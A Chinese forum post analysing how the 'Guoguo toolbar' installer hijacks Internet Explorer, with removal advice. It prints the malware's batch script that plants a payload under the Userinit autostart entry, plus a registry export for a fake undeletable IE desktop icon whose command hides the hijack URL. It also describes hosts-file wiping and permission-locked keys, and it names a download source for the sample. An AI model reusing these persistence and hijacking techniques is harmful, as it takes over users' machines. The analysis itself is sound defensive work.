看到大家求助桌面有2个ie，清理删除不了，主页也被更改，朋友们是被恶意软件更改了注册表项！就是包括主页被改为http://www.yy2000.net/?xxx5_360的朋友，也可以使用下面的ie修复脚本，以后大家ie浏览器主页被劫持，只要系统内没恶意文件了的话，就可用此脚本清理修复——当然，有些地方需要配合手动操作注册表！

要大家上传或给出出现2个ie问题的网址或软件，都没有，遗憾！

偶找了苹果工具条下载下来运行，发现除了系统内有恶意文件外（如果报告没有问题，那就是恶意文件已自我删除或被清理），而桌面有2个ie图标，主页被更改，不能恢复！
下面偶就测试果果工具条来做个行为分析：

运行下载的果果工具条安装程序：
在Program Files文件夹生成下面等文件

C:\Program Files\avd\macjie.ax
C:\Program Files\avd\macjie.dll
C:\Program Files\avd\macjie.ini
C:\Program Files\avd\MacJie.exe
C:\Program Files\avd\itemlist.ini
C:\Program Files\avd\backgrounds
C:\Program Files\avd\backgrounds\Brushed Metal\bg.ini
C:\Program Files\avd\backgrounds\Default\bg.ini
C:\Program Files\avd\poofs\main.ini
C:\Program Files\avd\poofs\winshutdown.vbs

itemlist.ini内容：

上网冲浪        type.app        C:\Program Files\Internet Explorer\IEXPLORE.EXE        http://www.365j.com/?cn        show.normal        show.normal        00000000        1.png
Windows Media Player        type.app        C:\Program Files\Windows Media Player\wmplayer.exe        -        show.normal        show.normal        00000000        20.png
-----
-----
WinRAR        type.app        C:\Program Files\WinRAR\WinRAR.exe        -        show.normal        show.normal        00000000        ico\winrar.png
-----
计算器        type.app        C:\WINDOWS\system32\calc.exe        -        show.normal        show.normal        00000000        160.png
NOTEPAD        type.app        C:\WINDOWS\NOTEPAD.EXE        -        show.normal        show.normal        00000000        25.png
我的电脑        type.nonapp        ::{20D04FE0-3AEA-1069-A2D8-08002B30309D}        -        show.normal        show.normal        00000000        17.png
帮助        type.nonapp        C:\Program Files\avd\poofs\main.ini        -        show.normal        show.normal        00000000        365.png
关机        type.nonapp        C:\Program Files\avd\poofs\winshutdown.vbs        -        show.normal        show.normal        00000000        Logoff1.png
....................................

更改注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
Userinit的数值为C:\WINDOWS\system32\userinit.exe,C:\Program Files\avd\macjie.exe
注意此macjie.exe，后面会讲到！

在system32下生成
C:\WINDOWS\system32\mdsaxn.exe
C:\WINDOWS\system32\WMSysPr9.prx
创建一个伪Remote Access服务，注释："支持此计算机通过网络的文件、打印、和命名管道共享。如果服务停止，这些功能不可用。如果服务被禁用，任何直接依赖于此服务的服务将无法启动。"

在temp文件夹里生成下面3个文件
Temp\OpenInternet.exe
Temp\xxxx
Temp\xxxx.bat

其中xxxx.bat为一个批处理文件，内容:

@echo off
:err
del /f /q C:\PROGRA~1\avd\macjie.exe
if exist C:\PROGRA~1\avd\macjie.exe goto err
copy C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xxxx C:\PROGRA~1\avd\macjie.exe
del /f /q C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xxxx
del /f /q C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xxxx.bat
....................................

看到copy C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\xxxx C:\PROGRA~1\avd\macjie.exe没？

意思就是复制xxxx到果果工具条安装文件夹里取名为macjie.exe，从而利用果果工具条更改注册表Userinit的数值达到开机启动xxx的目的——相当的恶毒和流氓！

OpenInternet.exe打开命令行
C:\Program Files\Internet Explorer\iexplore.EXE
http://ggkkj.com:9999/welcome.ph ... 38rfyt%2FKwog%3D%3D

在Application Data\Microsoft\AddIns生成2个文件
Application Data\Microsoft\AddIns\repro.dll
Application Data\Microsoft\AddIns\repro.exe  运行后删除自我

删除HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedUrls里的内容（不晓得什么意思，难道是怕留下url是记录？）和删除hosts的内容，怕别人在hosts里设置阻止http://www.365j.com/?ecn


在桌面有2个IE，不能删除和更改

注册表主要是针对浏览器动作，有些地方设置权限！使得这些键和值不能删除和修复。

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
Start Page
http://www.365j.com/?ecn

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
Start Page也更改设置失去完全控制权限

HKEY_USERS\S-1-5-21-682003330-746137067-839522115-1003\Software\Microsoft\Internet Explorer\Main,设置失去完全控制权限
Start Page
http://www.365j.com/?ecn

这里因为每台电脑不同，那么“*”地方的数字也不同。修改时候手动的话，要根据自己的注册表去找
HKEY_USERS\S-1-5-21-*-*-*-*\Software\Microsoft\Internet Explorer\Main


HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\SHELL\OPENHOMEPAGE\COMMAND默认值"%PROGRAMFILES%\INTERNET EXPLORER\IEXPLORE.EXE"后面添加了http://www.365j.com/?ecn

以及
HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\IEXPLORE.EXE\shell\open\command
默认值改为"C:\Program Files\Internet Explorer\iexplore.exe" http://www.365j.com/?ecn

HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page一样带尾巴
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel\{871C5380-42A0-1069-A2EA-08002B30309D}数值被改为1

在注册表
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace
添加了一个CLSID，如：{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}

所有的IE快捷方式后面都带了尾巴http://www.365j.com/?ecn，打开ie就链接到http://www.365j.com/?ggkkj网站

快速启动IE——"C:\Program Files\Internet Explorer\IEXPLORE.EXE" http://www.365j.com/?ecn
C:\DOCUMENTS AND SETTINGS\用户名\APPLICATION DATA\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\启动 INTERNET EXPLORER 浏览器.LNK
C:\DOCUMENTS AND SETTINGS\用户名\「开始」菜单\INTERNET EXPLORER.LNK
C:\DOCUMENTS AND SETTINGS\用户名\「开始」菜单\程序\INTERNET EXPLORER.LNK

如果做了以上的恢复，那么IE浏览器可以设置主页了！

但是，桌面上2个IE还是删除不了！

关键是这里添加的CLSID（每台机添加的CLSID不一样），这也是非常恶毒的事情。

如下面的
HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}

正确的是HKEY_CLASSES_ROOT\CLSID\{0002DF01-0000-0000-C000-000000000046}

而在CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}这个注册表下面，添加

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}]
@="Internet Explorer"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\DefaultIcon]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe,-32528"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell]
@=""

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell\D]
@="删除(&D)"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell\D\Command]
@="Rundll32.exe"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell\Open]
@="打开主页(&H)"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell\Open\Command]
@="C:\\Program Files\\Internet Explorer\\iexplore.exe %1 h%t%t%p%:%/%/%w%w%w%.%13%16%15%j%.%c%o%m%/%?%e%c%n"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell\属性(&R)]
@=""

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\Shell\属性(&R)\Command]
@="Rundll32.exe Shell32.dll,Control_RunDLL Inetcpl.cpl"

[HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}\ShellFolder]
@=""
"Attributes"=dword:00000010


这就是桌面IE能打开浏览器自动打开http://www.365j.com/?ggkkj网站，而又不能删除桌面上2个IE的原因！

——原来被人为的添加了一个IE浏览器的CLSID，而且右键也有删除项目，可点删除又没反应的真正原因！

那么大家遇到桌面上有2个IE删除不了的话，只要删除注册表
HKEY_CLASSES_ROOT\CLSID\{402DB7DD-D446-4DD2-5D26-D120BDD3B5D7}，再到桌面右键——刷新，看看效果如何？

这个CLSID电脑不同数字也不同，大家可在HKEY_CLASSES_ROOT\CLSID搜索：
C:\Program Files\Internet Explorer\iexplore.exe

或C:\Program Files\Internet Explorer\iexplore.exe,-32528

找到后注意看，千万别删了HKEY_CLASSES_ROOT\CLSID\{0002DF01-0000-0000-C000-000000000046}

切记！切记！！


桌面果果工具条："C:\Program Files\avd\MacJie.exe"运行又改主页，注册表再次被更改！

而且会自动删除HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedUrls里的内容和删除hosts的内容，怕别人在hosts里设置阻止http://www.365j.com/?ecn

可见果果工具条有多流氓！！！


提供助手清理脚本，这个ie修复脚本默认设置主页为about:blank


详细操作请看：


http://bbs.arswp.com/thread-49753-1-1.html




对于C:\Program Files\avd\MacJie.exe这个已被替换的果果工具条——其实就是xxx

37款杀软，竟然没一个报毒！

文件: C:\Program Files\avd\MacJie.exe
大小: 221184 字节
文件版本: 2.0.1.1
修改时间: 2009年9月2日, 22:01:06
MD5: 9ED7181EF9017C669D91D2DBBB032C83
SHA1: EB30F54987E4D98C76DD82FF0EFE40F40CE268E5

CRC32: BCBD09F9


有兴趣的朋友到到果果官方网站下载安装

http://www.ggkkj.com/index.html

注：为了找这样本，偶在好几个地方下载了果果工具条安装，最后还是官方网站找到。